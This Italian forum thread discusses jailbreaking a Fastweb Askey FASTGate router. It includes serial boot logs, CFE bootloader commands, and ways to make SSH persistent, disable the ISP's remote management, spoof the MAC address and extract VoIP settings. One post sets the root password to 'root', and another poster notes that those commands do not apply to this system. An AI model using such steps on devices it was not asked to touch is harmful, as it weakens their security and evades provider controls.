IlPuntoTecnico
Hardware e Software => Connessioni ADSL/VDSL/FTTC => Topic aperto da: ziom - 15 Dicembre 2017, 12:38
-
Ciao a tutti,
qualcuno ha messo mani su questo router che fornisce Fastweb x adsl/vdsl/fibra? Non so se anche Telecom fornisce lo stesso modello. C'è qualche possibilità di sostituire/sbloccare il fw di Fastweb?
-
Allora per il firmware unbrand e source code fw e non fw ho chiesto io @ziom potrebbe il nostro caro @Ansuel darmi una mano visto che
Producer Askey
Product name RTV1907VW
Software version 1.0.1b
Firmware version 0.00.47_FW_200_Askey 2017-05-18 16:48:01
Modem Uptime 0day:0h:41m:53s
Hardware version GATE01 ecco le info da default e che si ha il mini httpd come tipo di sistema browsing
(https://s14.postimg.org/xe996ac9d/provea.png)
-
Penso che senza il dispositivo sotto mano possa fare ben poco @Ansuel se non dare indicazioni di massima...
-
Ciao a tutti,
qualcuno ha messo mani su questo router che fornisce Fastweb x adsl/vdsl/fibra? Non so se anche Telecom fornisce lo stesso modello. C'è qualche possibilità di sostituire/sbloccare il fw di Fastweb?
ciao e' possibile sbloccarlo ma con la seriale ... forse poi facendo il dump del firmware si riesce a trovare qualche baco da sfruttare in remoto
https://julians.design/2018/02/26/fastgate/
-
ciao,
ho seguito guida per accedere in telnet e poi ho cercato un po' di capire come funziona (per almeno rendere permanenti le modifiche che si possono fare via command line, ad es. al firewall come descritto nella guida di julian
Riporto qui un po' di info sperando che poi qualcuno che ne sa più di me possa darmi qualche dritta:
Partiamo dal boot:
HELO
CPU0
PMCM
PMCS
PMCD
CODE
L1CD
MMUI
ZBBS
MAIN
4.1605-1.0.38-118.3
DRAM
NVRAM memcfg 0x407
MCB chksum 0xf64e52b4
DDR3-1600 CL11 256MBx2
Changed Byte Lane LDE
Changed Byte Lane LDE
PASS
FPS0
BT03
0001
BT02
1976
NAN3
RFS2
NAN5
Base: 4.16_05
CFE version 1.0.38-118.3 for BCM963138 (32bit,SP,LE)
Build Date: Tue Nov 1 23:00:13 CST 2016 (charles@charles-All-Series)
Copyright (C) 2000-2015 Broadcom Corporation.
Bootloader version: CFEROM : 2.5.2Nr1820 CFERAM : 2.5.2Nr1820
Boot Strap Register: 0x7dfffc2f
Chip ID: BCM63136B0, ARM Cortex A9 Dual Core: 1000MHz
Total Memory: 536870912 bytes (512MB)
NAND ECC BCH-4, page size 0x800 bytes, spare size used 64 bytes
NAND flash device: , id 0xc2dc block 128KB size 524288KB
pmc_init:PMC using DQM mode
Board IP address : 192.168.1.1:ffffff00
Host IP address : 192.168.1.100
Gateway IP address :
Run from flash/host/tftp (f/h/c) : f
Default host run file name : vmlinux
Default host flash file name : bcm963xx_fs_kernel
Boot delay (0-9 seconds) : 1
Boot image (0=latest, 1=previous) : 1
Default host ramdisk file name :
Default ramdisk store address :
Board Id (0-31) : RTV1907VWC3
Number of MAC Addresses (1-32) : 16
Base MAC Address : e8:d1:1b:40:7a:c8
PSI Size (1-128) KBytes : 48
Enable Backup PSI [0|1] : 0
System Log Size (0-256) KBytes : 0
Auxillary File System Size Percent: 0
MC memory allocation (MB) : 4
TM memory allocation (MB) : 44
DHD 0 memory allocation (MB) : 14
DHD 1 memory allocation (MB) : 0
DHD 2 memory allocation (MB) : 0
WLan Feature : 0x00
Voice Board Configuration (0-1) : LE9642_ZSI_BB
Partition 1 Size (MB) : 8M
Partition 2 Size (MB) : 1M
Partition 3 Size (MB) : 4M
Partition 4 Size (MB) (Data) : 4M
*** Press any key to stop auto run (1 seconds) ***
Auto run second count down: 1
[charles dbg] waiting for (key1=33, key2=34, key3=36, rst=32) key1=1 key2=1 key3=1 rst=1
0
Booting from previous image (address 0x0f700000, flash offset 0x0f700000) ...
Decompression LZMA Image OK!
Entry at 0x00008000
Starting program at 0x00008000
Booting Linux on physical CPU 0
...
...
...
da qui si può accedere al prompt CFE>, di seguito i comandi possibili
CFE> help
Available commands:
x Change extra partitions size
find Find string in NAND
comp Compare NAND blocks
fb Find NAND bad blocks
dn Dump NAND contents along with spare area
mtest Simple RAM read/write test
fcread read board finial check value
fc set board finial check value
phy Set memory or registers.
otpr Read btrm otp bits
sm Set memory or registers.
db Dump bytes.
dh Dump half-words.
dw Dump words.
w Write the whole image start from beginning of the flash
e Erase NAND flash
wp Write pmc (previously loaded through JTAG to flash block 0.
ws Write whole image (priviously loaded by kermit or JTAG) to flash .
go goto and execute from specefic address.
r Run program from flash image or from host depend on [f/h] flag
p Print boot line and board parameter info
c Change booline parameters
i Erase persistent storage data
ddr Change board DDR config
a Change board AFE ID
b Change board parameters
reset Reset the board
pmdio Pseudo MDIO access for external switches.
spi Legacy SPI access of external switch.
closeavs pmc close avs cmd
cpufreq set CPU frequency
force override chipid check for images.
help Obtain help for CFE commands
For more information about a command, enter 'help command-name'
*** command status = 0
qui ho capito che si può scegliere la flash con cui partire (latest o previous) anche perchè facendo un po' di prove non so come mi sono già fumato quella latest (non mi fa più il boot, se riesco allego boot completi sotto ho allegati ed altre opzioni ma non capisco come allegare, forse server altro browser)
una volta fatto il boot e loggatomi queste un po' di info:
# mount
rootfs on / type rootfs (rw)
ubi:rootfs_ubifs on / type ubifs (ro,relatime)
proc on /proc type proc (rw,relatime)
tmpfs on /var type tmpfs (rw,relatime,size=420k)
tmpfs on /mnt type tmpfs (ro,relatime,size=16k)
sysfs on /sys type sysfs (rw,relatime)
debugfs on /sys/kernel/debug type debugfs (rw,relatime)
mtd:data on /data type jffs2 (rw,relatime)
mtd:bootfs on /bootfs type jffs2 (ro,relatime)
tmpfs on /etc type tmpfs (rw,relatime)
tmpfs on /dev type tmpfs (rw,relatime)
tmpfs on /web type tmpfs (rw,relatime)
usbfs on /proc/bus/usb type usbfs (rw,relatime)
devpts on /dev/pts type devpts (rw,relatime,mode=600,ptmxmode=000)
cgroup on /sys/fs/cgroup type tmpfs (rw,relatime)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu type cgroup (rw,relatime,cpu)
cgroup on /sys/fs/cgroup/cpuacct type cgroup (rw,relatime,cpuacct)
cgroup on /sys/fs/cgroup/memory type cgroup (rw,relatime,memory)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,relatime,devices)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,relatime,freezer)
tmpfs on /lib/lxc/rootfs type tmpfs (rw,relatime)
# df
Filesystem 1024-blocks Used Available Use% Mounted on
ubi:rootfs_ubifs 218132 44760 173372 21% /
mtd:data 4096 936 3160 23% /data
mtd:bootfs 4096 3032 1064 74% /bootfs
# ls /bin
WiFi-alliancelogo_3D.png memaccess
acs_cli mkdir
acsd mknod
adsl more
adslctl mount
ash mount.sh
aspmd mtd_debug
bash mtdinfo
bcm_boot_launcher mv
bcm_flasher nanddump
bcmmserver nandtest
bdmf_shell nandwrite
bftpd nas
bpm nas4not
bpmctl nfct
brctl nice
bs ntfs-3g
bsd nvram
busybox nvramUpdate
cat openl2tpd
chmod openssl
conntrack periodicstat
conntrackd ping
consoled ping6
cp pppd
date ps
dd psictl
ddnsd pspctl
deluser pwd
df pwr
dhcp6c pwrctl
dhcp6s qrctl
dhcpc radvd
dhcpd rastatus6
dhd rawSocketTest
dhdctl ripd
dmesg rm
dnsdomainname runner
dnsproxy scratchpadctl
dnsspoof send_cms_msg
doc_loadbios setmem
dropbearconvert sh
dry simcard_sample
dsldiagd sleep
dumpmem smbd
eapd smbpasswd
ebtables smd
echo sntp
eid.sh sqlite3
epi_ttcp ssd
ethctl sshd
ethswctl ssk
eventd st_shell
false stress
fc stty
fcctl switch.sh
flash_erase swmdk
flash_otp_dump sync
flash_otp_info tar
flashcp tc
ftl_format tcpdump
grep telnetd
gunzip tmctl
gzip tmsctl
hostname toad
hotplug toast
hspotap tr143DownloadDiag
httpd tr143EchoCfgServer
icon_blue_eng.png tr143UploadDiag
icon_blue_zxx.png tr64c
icon_green_eng.png tr69c
icon_green_zxx.png true
icon_orange_eng.png ubiattach
icon_orange_zxx.png ubicrc32
icon_red_eng.png ubidetach
icon_red_zxx.png ubiformat
ip ubimkvol
ip6tables ubinfo
iperf ubirename
ippd ubirmvol
iptables ubirsvol
iptables-restore ubiupdatevol
iptables-save udhcpd
kill umount
lld2d upnp
ln urlfilterd
ls usleep
lxc-attach vi
lxc-autostart vlanctl
lxc-cgroup vodsl
lxc-checkconfig vpmstats
lxc-clone web.sh
lxc-config websockd
lxc-console wifi-abgn-logo_270x73.png
lxc-create wl
lxc-destroy wl_server
lxc-execute wl_server_socket
lxc-freeze wlconf
lxc-info wlctl
lxc-ls wlevt
lxc-monitor wlevt2
lxc-snapshot wlmngr
lxc-start wlmngr2
lxc-stop wps_monitor
lxc-unfreeze xdslctl
lxc-unshare xmppc
lxc-usernsexec xtables-multi
lxc-wait xtm
mcp xtmctl
mcpctl zcat
mcpd zebra
mdkshell
# ls /sbin
depmod hotplug init.lxc logread modprobe rmmod syslogd
ethctl ifconfig insmod lsmod poweroff route vconfig
halt init klogd mdev reboot sysinfo
# ls /usr/bin/
[ free lsusb sar traceroute6
[[ ftpget mpstat sendarp traffic.sh
awk iostat nc taskset traffic_ds.sh
chrt isc_dhclient pidstat test traffic_us.sh
cut isc_dhcpd pmacctd tftp tty
dirname killall renice tftpd uptime
expr logger riptool top wget
find lspci sadf traceroute
# ls /usr/sbin/
BulkData miniupnpd
UDPechoServer monitor_ip_conntrack
WiFiDiagnostic mt_cmd
at_cmd nbnsd
backup_dongle.sh nbtscan
backup_dongle_udhcpc_script nbtscan.sh
bd_svr nmbd
boost_util.sh ntfs-3g
chat p910nd
cmd_agent_ap pdbedit
curl pingq
cwmp pingqx
daylightadjust.sh port_mirror.sh
dnrd portmirror
downloaddiag pppd
dropbear pppoe.so
dropbearkey qos.sh
firewall.sh qos_selected.sh
flash_eraseall radvd
fw_upgrade rc_task
gpio_util scan_cmd.sh
guestwifi.sh send_event_bulkdata
hotplug-call send_event_tr69
hotplug2 smbd
hotspot.sh sniproxy
hotspot_probe speedtest
hotspot_wanduck stenvram
hswebd stnvram
htpasswd stshell
i2cdump system_probe
i2cget traffic.sh
i2cset uploaddiag
ipping_tr69 upnpc_tr69
lanscan usb-devices
led_util usb_modeswitch
led_util_log usb_print_server
linkrate_util wps_cmd
mini_httpd
# cat /proc/mtd
dev: size erasesize name
mtd0: 0f2e0000 00020000 "rootfs"
mtd1: 0f6e0000 00020000 "rootfs_update"
mtd2: 00400000 00020000 "data"
mtd3: 00020000 00020000 "nvram"
mtd4: 0f6e0000 00020000 "image"
mtd5: 0f6e0000 00020000 "image_update"
mtd6: 00400000 00020000 "bootfs"
mtd7: 20000000 00020000 "dummy2"
mtd8: 00400000 00020000 "misc3"
mtd9: 00100000 00020000 "misc2"
mtd10: 00800000 00020000 "misc1"
mtd11: 0e861000 0001f000 "rootfs_ubifs"
mtd12: 00100000 00020000 "STNVRAM"
mtd13: 00040000 00020000 "STENVRAM"
mtd14: 00100000 00020000 "STNVRAMBKP"
mtd15: 00040000 00020000 "STENVRAMBKP"
# mtdinfo
Count of MTD devices: 16
Present MTD devices: mtd0, mtd1, mtd2, mtd3, mtd4, mtd5, mtd6, mtd7, mtd8, mtd9, mtd10, mtd11, mtd12, mtd13, mtd14, mtd15
Sysfs interface supported: yes
come detto essendomi già "fumato" la flash principale, se qualcuno sa darmi qualche dritta posso ancora "giocarmi" la seconda...
Più tardi invio altre info e allego boot completi se ce la faccio
Grazie in anticipo a chi potrà aiutarmi
Enrico
-
ok scusa,
mi spieghi come si fa?
forse ho già capito, pulsante con il cancelletto...
e si pùo anche allegare un file di testo (così metto il boot completo)?
grazie
-
ciao e' possibile sbloccarlo ma con la seriale ... forse poi facendo il dump del firmware si riesce a trovare qualche baco da sfruttare in remoto
https://julians.design/2018/02/26/fastgate/
Ecco un bel dump. Buona ricerca. :D
https://www.dropbox.com/s/uxqjw1mb3o0g2wv/Askey%20RTV1907VW.zip
-
Scherzi a parte ho prodotto questa immagine di OpenWrt (MOOOLTO PRECARIA) che non ho avuto modo di testare perché nel tentativo di flasharla ho bruciato letteralmente il router. Se ci fosse qualcuno disposto a provarla (e a trovare un modo per flashare roba sul router) sono a completa disposizione per successivi update e rifiniture all'immagine.
https://www.dropbox.com/s/huc8vihi3fkr760/openwrt-brcm63xx-smp-RTV1970VW.zip?dl=0
PS: A quanto pare il flashing è bloccato dal CFE (non ho capito bene se è un artefatto di Fastweb per impedire l'installazione di immagini non proprie, oppure se ho solo sbagliato il formato :blush: ). Appena riesco a procurarmi un'immagine originale avrete mie notizie.
-
Magari Ansuel potrebbe aiutarti visto che anche a me interessa lo sblocco del fastgate Askey 35b..
-
allora qualche passo avanti io l'ho fatto
il modem ha una flash divisa in due parti, dal cfe al boot si può scegliere con che firmware partire
facendo il dump della partizione mtd "rootfs" e montandola in una macchina linux è possibile modificare il filesystem e poi riflashare
io ad esempio ho aggiunto uno script al boot che rende permanente l'attivazione del telnet/ssh al boot
non ho capito ancora però dove vengono salvate tutte i settaggi che si fanno dalla pagina web, nella partizione nvram sembrano esserci solo i parametri del wirless
ciao
-
con
stnvram show puoi leggere i parametri
-
allora qualche passo avanti io l'ho fatto
il modem ha una flash divisa in due parti, dal cfe al boot si può scegliere con che firmware partire
facendo il dump della partizione mtd "rootfs" e montandola in una macchina linux è possibile modificare il filesystem e poi riflashare
io ad esempio ho aggiunto uno script al boot che rende permanente l'attivazione del telnet/ssh al boot
non ho capito ancora però dove vengono salvate tutte i settaggi che si fanno dalla pagina web, nella partizione nvram sembrano esserci solo i parametri del wirless
ciao
ciao wax77 ci puoi dire a che punto sei e se è possibile e come flashare questo catorcio in modo da fare le prime cose (telnet/ssh al boot) grazie mille per la disponibilità cercando qunatomeno ti reperire tutti i parametri per sfruttare sia la linea che il voip della fastweb
-
ciao,
io, come ho già specificato, ho trovato il modo di modificare il filesystem rootfs (di tipo ubifs) (con nanddump si fa il dump della partizione mtd che lo contiene, si monta in una macchina linux usando nandsim / flash_erase / ubiformat / ubiattach, lo si modifica, lo si ridumpa e lo si riflasha con ubiformat)
in tal modo ho inserito uno script nella cartella /etc/rc3.d che viene eseguito al boot e che richiama uno script salvato nella directory /data (così da poterlo modificare senza dover riflashare ogni volta...)
in questo modo posso modificare ad ogni avvio la configurazione di iptables e killare il processo cwmp (accesso remoto al router da parte di fastweb)
inoltre ho recuperato una versione di busybox più recente con molti più comandi e impostato un check che ogni 5 min verifica che iptables non ricarichi la conf di default
pro: è molto distante dal poter flashare un firmware unbranded (non saprei nemmeno dove trovarlo anche se qualcosa sembra esserci nella cartella /web) ma qualcosa mi permette di personalizzare...
contro: è comunque necessario collegarsi in seriale (via UART) almeno la prima volta ed il processo esposto sopra di modifica del rootfs è molto macchinoso
ciao
-
Ma sai come recuperare i diversi settaggi Fastweb di configurazione potresti dargli uno sguardo ?? Potresti postare i parametri estratti togliendo i tuoi dati sensibili ? Potresti elencarci tutto quello che c’è nella cartella web ?? Grazie mille per la disponibilità !!
-
ho notato che ha anche due cartelle la su detta "web" e un'altra webs .....
ormai ho perso la mano con comandi di vario genere e quindi ad ora sono bloccato e mi leggo il log di boot per capire un po di cose ... se qualcuno mi vuole aiutare a fare qualcosa quantomeno ad arrivare al punto di wax77 si faccia avanti ... busibox aggiornato e compilato dove lo hai reperito puoi linkare qualcosa??
in più mediante ssh è possibile esportare sul pc dei file per vederli meglio ? con il comando vi sto diventando scemo ...
vorrei cercare di recuperare la configurazione di mamma fastweb per vedere parametri ecc se qualcuno può dare consigli si faccia avanti ...
-
allora vi aggiorno ... c'è un comando per l'update prima del busybox... e ho trovato un switch che credo che cambi l'interfaccia ma al momento non riesco a farlo andare ...
-
..🤔🤔
-
Ci sono news per lo sblocco??
-
per ora io l'ho sbloccato... è molto semplice con seriale e si può comodamente modificare tutto siccome è possibile montare la partizione interna r/w quindi in poco tempo ho creato uno script che all'avvio riabilita accesso telnet e tutto
con @roleo quando ha tempo dovremmo metterci a creare un'immagine da mandargli da modalità di ripristino... triggerabile mediante il buon vecchio "metodo del ponticello" AGPF
@taetae comunque si fa tutto con i comandi nvram e altro... non c'è una specifica configurazione in questi robi... ce ne sono almeno due una di provisioning e una del modem
e da quanto ho visto non è che ci fai troppissimo...
-
Grazie per la risposta è per il lavoro svolto @Ansuel e @roleo ... aspetterò altre vostre news e se avete bisogno di beta tester .... ho già la seriale montata .... tenendo in considerazione che é il mio unico modem perché gli amici di Fastweb hanno impostato il blocco macaddress!! O se mi date qualche info in più cerco di riprendere anni di abbandono nel settore per rivivere i tempi che furono anni fa per chi si ricorda ancora :D :D !! Comunque ancora complimenti per quello che fate e le vostre grandi capacitá nel settore...
Ps @Ansuel una domanda non pertinente : sapresti indicarmi in che modo posso cambiare definitivamente un macaddress su un fritzbox ? Grazie per una eventuale risposta
-
il blocco macaddress è facilmente superabile... (usi il macaddress del fastgate sul modem che vuoi tu)
è una funzione che dovrebbe starci su ogni modem sui fritz dovrebbe esserci uboot (da quanto ne so non usano cfe) quindi da lì dovrebbe starci l'opzione per modificare le variabili di ambiente ...
printenv dovrebbe fare al caso tuo.... controlla se è lì... altrimenti se ricordo male i fritz hanno una partizione separata che ha questo tipo di dati.
comunque la cosa da fare è usare il comando brcmtools per creare un enorme immagine cfe che includa il cfe stesso e il firmware
-
Scusate ragazzi i comandi in busybox per poter scaricare e ricaricare un file quali sono ?
Wget ... ma la fintassi ? Esempio prendere dal router un file e copiarlo in c:\ .... provo con cat a leggerli ma mi manda in crash il Pc e me lo riavvia
-
Ma avete già provato a chiedere i sorgenti?
Askey non l'abbiamo mai messo alla prova.
-
io ho contattato qui [email protected] ma non ho avuto ancora risposta... se volete provare anche voi ...
-
Ansuel puoi postare le immagini della GUI sbloccata con tutti i menù che sono disponibili con lo sblocco?
Grazie
-
robe sbloccate purtroppo c'è ben poco... siccome usano una loro api interna, aggiungere funzionalità è molto difficile... anche perchè è difficile gestire la configurazione... alcuni menù sono effettivamente sbloccabili... però molte pagine sono completamente svuotate delle funzioni che servono per far vedere i comandi...
i ogni caso nel repository ci sono i dump... usare binwalk e vedrete i file...
per sbloccarlo la procedura è tediosa... l'unico modo per trasferire file è usare il protocollo tftp siccome dropbear non è compilato con il support scp e di qualche server ftp neanche l'ombra...
al massimo dallo sblocco si potrebbero ottenere info utili come quanto si aggancia... ma è possibile averlo anche in altri modi facendo una chiamata diretta...
-
@Ansuel scusa se ti disturbo ma facendo uno show della memoria su un’altro pc ho notato che ha a disposizione più Mac address a secondo della connessione .. ti risulta ??
-
se intendi che wifi 2.4 il 5 ghz e le porte ethernet hanno diverso mac address si è normale. funziona così per tutti i modem
di solito partono da quello base del modem e poi incrementano l'ultima cifra di uno
-
Si ok quindi quello che viene memorizzato da Fastweb è quello della wlan giusto ?
-
quello che viene registrato da fastweb è quello che sta sulla targhetta sotto al modem in teoria... dove ci sono i seriali
-
hai ragione teoricamente è quello ... ed ad esempio (nel tim hub del mio amico che gentilmente mi ha prestato) sostituendolo in /etc/config/network alla connessione wlan dovrebbe far si che agganci il dhcp e assegni ip invece da solo la portante ....
-
si dovrebbe... o dovresti passarlo come parametro del dhcp forse... non so
online dovrebbe esserci abbastanza roba...
-
grazie, oggi se ho tempo gli do uno sguardo
-
Scusate ragazzi ma è possibile usarlo come router con linea Linkem.
Mi potete passare Il file script al boot e dove si deve mettere
-
Ma una volta sbloccato che funzioni in più ci sono
-
Ciao ragazzi volevo provare a collegarmi col router tramite seriale ma non sono riuscito ad aprirlo :facepalm:
oltre le due viti in basso cosa devo levare? Grazie!
-
Novità ragazzi
-
Ragazzi ma una volta fatta la tivazione del telnet/ssh se spengo e riaccendo il modem micha devo fare tutto da capo
-
Ragazzi ma una volta fatta la tivazione del telnet/ssh se spengo e riaccendo il modem micha devo fare tutto da capo
si ad ogni riavvio devi rifare il tutto
-
Grazie per la risposta
-
in realtà i modi per rendere l'attivazione permanente ci sono :)
-
Ansuel celo spiegi come fare grazie
-
prova a eseguire i comandi qui sotto da seriale
:O
-
COMANDI DA ESEGUIRE SULL SHELL:
uci set dropbear.@dropbear[0].PasswordAuth='on'
uci set dropbear.@dropbear[0].RootPasswordAuth='on'
uci set dropbear.@dropbear[0].enable='1'
uci commit
echo -e "root\nroot" | passwd/etc/init.d/dropbear restart
-
Salve ragazzi,
è possibile estrapolare i dati VOIP per utilizzarli poi nel fritzbox 7590?
grazie mille!
-
Ecco un bel dump. Buona ricerca. :D
https://www.dropbox.com/s/uxqjw1mb3o0g2wv/Askey%20RTV1907VW.zip
Ciao, premetto che il router mi arriva domani, mi sono portato avanti e ho scaricato il tuo dump ma non riesco ad accedervi... (avevo scritto anche sul post di julian)
Dunque in virtualbox ho tirato su una ubuntu minimal, ho ricompilato da 0 il kernel
Per il kernel ho scelto il 4.18-rc4 perchè ho "scoperto" che il id 0xc2dc corrisponde ad MX30LF4G18AC (Macronix) ed è stato aggiunto dalla release rc-3 in poi ("drivers/mtd/nand/raw/nand_macronix.c")
lo ho abilitato così abilitandolo così :
- Device Drivers ---> Memory Technology Device (MTD) support ---> Enable UBI - Unsorted block images --->
- NAND Device Support ---> File systems ---> Miscellaneous filesystems ---> UBIFS file system support - (ho abilitato tutto)
- Device Drivers ---> Memory Technology Device (MTD) support ---> Self-contained MTD device drivers --->
524288 MTDRAM device size in KiB
128 MTDRAM erase block size in KiB
riavviato e bootato con il nuovo 4.18.0-rc4
ed ora ho dato i seguenti comandi :
sudo modprobe nandsim first_id_byte=0x20 second_id_byte=0xac third_id_byte=0x00 fourth_id_byte=0x15
sudo ubiformat /dev/mtd0 -O 512
sudo ubiattach -m 0 -d 0 -O 512
sudo nandwrite /dev/mtd0 mtd2.img
Fin qui tutto bene, ma non riesco a montarlo : sudo mount /dev/ubi0 out/
mount: /home/test/ubi/out: /dev/ubi0 is not a block device.
Anche in questo modo non va :
sudo mount -t ubifs ubi0:nand0 out/
mount: /home/test/ubi/out: unknown filesystem type 'ubifs'.
ora mi fermo, non so come andare avanti :(
Hai qualche dritta da darmi?
graaaazie
PS: tutto questo per vedere se "per caso" si riesce ad estrapolare il config voip
-
perchè non usare binwalk o.o
tanto utile...
comunque per avere il root fisso per ora si deve usare un metodo sporco che consiste nel montare r/w il filesystem ubi e aggiunge ll'impostazione al file rc.local o creare un rc.d ad hoc...
sopratutto dalle mie "DIVERSAMENTE RECENTI RICERCHE" è necessario fare un iptables- F (non so se era questo il comando, in ogni caso va pulita la tabella del firewall) perchè l'accesso ssh è bloccato a livello firewall anche...
IL SISTEMA NON è OPENWRT QUINDI NON VA NESSUN COMANDO TIPO UCI SET (GIUSTO PER PRECISARE)
le info voip sono estraibili dai file config salvati nelle partizioni apposite... (un pò difficoltoso ma sono lì)
con il vecchissimo metodo del ponticello è possibile abilitare il flash del firmware ed è quindi fattibilissimo creare un firmware custom da installare... ma @roleo deve aiutarmi in questo... bisogna usare lo stesso metodo che si uso con agpwi in cui si faceva un file contenete un megacfe contenente anche il firmware siccome il formato del firmware fastweb e quello che accetta il cfe broadcom sono diversi...
la flash consiste in due cfe e due bank per i firmware e poi micro partizioni per file di configurazioni e log vari... e configurazione di default...
ECCO TUTTO :) è roba che risale a 3-4 mesi fa... mi fermai perchè sinceramente fare metodi in cui bisogna fare comandi da seriali è più dispensioso rispetto a sbloccarlo con metodo ponticello e firmware custom (con magari una gui modificata e sbloccata :) )
-
Grazie mille sei stato davvero molto gentile ed infatti con binwalk sono riuscito ad aprire tutto :)
più o meno sai dove potrebbe essere il config per la voip? o quello per la connessione ad internet? (forse è li dentro)
grazie!
-
Scusate ragazzi,
è arrivato il modem e lo ho già aperto e collegato la seriale to usb.
Tutto bene, windoze la riconosce ma quando fato a collegarmi rimane la bash "nera" senza log senza altro...
cosa sbaglio?
-
Ciao a tutti, mi unisco per chiedere se si possa caricare un firmware mod per usarlo con altri operatori.
Nella fattispecie a me servirebbe per infostrada home fibra(fttc), di cui ho già le mie credenziali voip.
Il router che vendono loro, lo zyxel vmg 8823 ha sempre qualche guasto, sono in "trattative" per cambiarlo
per la 4° volta da ottobre del 2017........
Grazie a chi mi aiuterà.
-
Ciao ragazzi nessuna novità
-
Salve a tutti, ho trovato come caricare un nuovo firmware.
Avviare tenendo premuto il tasto reset tenendolo premuto fin quando tutte le spie del frontale non lampeggiano di bianco.
Premere il tasto centrale, la prima rimarra bianca le altre rosse.
Collegare la lan sulla porta lan 1 (lato USB)
Collegarvi all'indirizzo http://192.168.1.1/ ricordandovi di settare il vostro ip su 192.168.1.2 e subnet 255.255.255.0
troverete questa sorpresa
Select Only if you want to write misc partition
Update Software
Step 1: Obtain an updated software image file.
Step 2: Enter the path to the image file location in the box below or click the "Browse" button to locate the image file.
Step 3: Click the "Update Software" button once to upload the new image file.
NOTE: The update process takes about 2 minutes to complete, and your Router will reboot.
Software File Name: Sfloglia UPDATE SOFTWARE
se non riesce al primo tentativo provate a resettare il router con la procedura 30-30-30
(https://wiki.dd-wrt.com/wiki/index.php/Hard_reset_or_30/30/30/it)
ora alla ricerca di un firmware stabile e aperto.
(spero di non avere trovato acqua calda)
-
Bravo che bello speriamo che si trova il firmware libero, o meglio openwrt
-
in realtà questa cosa si sa già da tempo...
quello è la pagina di caricamento stock del cfe broadcom...
non esistono firmware che si caricano da lì e non esistono firmware liberi...
vanno creati e adattati per essere flashati con quel bootloader...
serve la gente che fece i firmware e le modifiche a agpwi e quello vecchio che non ricordo nome... insomma quelli col metodo ponticello
-
qualcuno sa se con le ultime modifiche questo dispositivo diventerà utilizzabile anche con altri operatori?
-
Ciao a tutti. Mi unisco anche io alla richiesta dei parametri VOIP di questo router per poterle inserire in un fritbox. :pray:
Purtroppo le mie scarse conoscenze informatiche non mi permettono si seguire le vostre indicazioni e trovarmele da solo :worry:
Grazie
-
...
Ciao @wax77, potresti riportare i comandi che hai dato nel bootloader CFE per cambiare il boot da latest a previous? Ho visto che il parametro dovrebbe essere "Boot image" ma non so come impostarlo.
Grazie mille
edit
Ho trovato i comandi per impostare l'altro boot, al momento per evitare che si avviasse cwmp ho rinominato il binario in modo che non possa più eseguirlo altrimenti al primo avvio mi imposta di nuovo la latest come immagine di default.
Pensi sia possibile riportare il contenuto della flash previous su latest?
Grazie
-
Scusa che vol dire previous su latest che questo modem ha 2 immagini
-
Scusa che vol dire previous su latest che questo modem ha 2 immagini
Si ha due immagini di boot e si può scegliere quale far partire.
-
E la 2 immagine e sbloccata.
Potresti fare una guida
-
Ho seguito quello che c'è scritto nel post di wax
-
Una guida passo passo fosse meglio.
E dirci i comandi da dare per poter cambiare immagine
-
@MisterFTTH scusami era necessario per quello che aveva chiesto @00007
@00007 segui la guida di Julian: http://julians.design/2018/02/26/fastgate/ una volta che ti sei collegato via seriale avvia il fastgate premi velocemente qualsiasi tasto finché non compare questa scritta:
CFE>
da qui digita c e premi enter
e poi quanto ti chiede:
Boot image (0=latest, 1=previous)
digita 1 e premi enter
a questo punto spegni e riaccendi e si avvierà la versione precedente.
-
Grazie mille domani mattina ci provo, e per rinominare il binario come si deve fare.grazie ancora
-
No, non era necessario citarlo in toto: sarebbe stato più che sufficiente un riferimento al link del post. Non voglio ripetermi.
La penso diversamente.
Ciao :)
-
Piccolo passo avanti, ho ottenuto i firmware originali di fastweb, di seguito il link della versione 0.00.67:
http://59.0.121.191:8080/ACS-server/file/0.00.67_FW_200_Askey
E questi i nomi di tutti quelli presenti:
0.00.167_FW_200_Askey
0.00.267_FW_200_Askey
0.00.47_FW_200_Askey
0.00.62_FW_200_Askey
0.00.67_FW_200_Askey
0.00.81_FW_200_Askey
Se qualcuno è interessato a capire tutto il giro ho scritto un articolo più dettagliato qui:
https://ieie.home.blog/
Vi anticipo che non sono firmware direttamente utilizzabili dall'interfaccia CFE ma possono essere flashati solo con router avviato con il comando "/usr/sbin/fw_upgrade"
EDIT:
I firmware erano già stati trovati, nell'elenco del repository mancano:
0.00.167_FW_200_Askey
0.00.267_FW_200_Askey
probabilmente perchè sono più recenti.
-
in realtà i firmware sono presenti da un pezzo sul repository qui....
-
ho provato a fare una ricerca qui:
https://repository.ilpuntotecnico.com/files/
usando 0.00.167_FW_200_Askey
ma non ho trovato nulla, avete usato un nome diverso?
EDIT:
usando solo Askey li ho trovati, rettifico il post. Grazie
-
Quindi ad ora, l'unica mod possibile è il cambio dns dopo aver ottenuto l'accesso ssh tramite seriale, quindi hard mod, giusto? Ancora niente openwrt?
-
Openwrt non si potrà mai avere ... Non é basato su quello
-
Salve, qualche novita?
-
@nice.guy12 OpenWRT è già installato "in segreto" su molti dispositivi Askey e Tecnicolor DGA4131 chiamate CPE Unica (fungono sia da IAD VoIP che da MOS quindi NON VoIP)
Il vendor di questi due ultimi modelli però ha bloccato per ragioni di sicurezza l'accesso in scrittura addirittura ai superuser Help Desk 2° livello.
La possibilità però di sbloccarlo c'è. E per altro può farlo solo l'utente. Il come non te la so indicare per ora.
-
il DGA4131 ha OpenWRT, ma non mi pare sia lo stesso per Askey
-
@FrancYescO più di qualcuno ce l'ha.. Vi svelo un segreto.. lavoro per Fastweb... :-X
-
@Combine non ho ben capito, ci sono askey con oWRT e altri che non lo hanno?
Comunque forse lo svantaggio più grande su questo device è non avere la possibilità di failboot/switchare bank il che significa che anche exploitato una volta rilasciato pubblicamente verrebbe probabilmente fixato in poco senza possibilità di tornare indietro di firmware per riaverlo
-
@FrancYescO sì, dipende dalla distribuzione di suddetti Askey, e ti assicuro che non sono stati i clienti (o amici) ad scrivere OpenWRT questo è poco ma sicuro.
Comunque è un modem pietoso, difatti ora Fastweb consegna come UCPE la DGA4131 che invece lo montano tutti ed è molto più smanettabile.
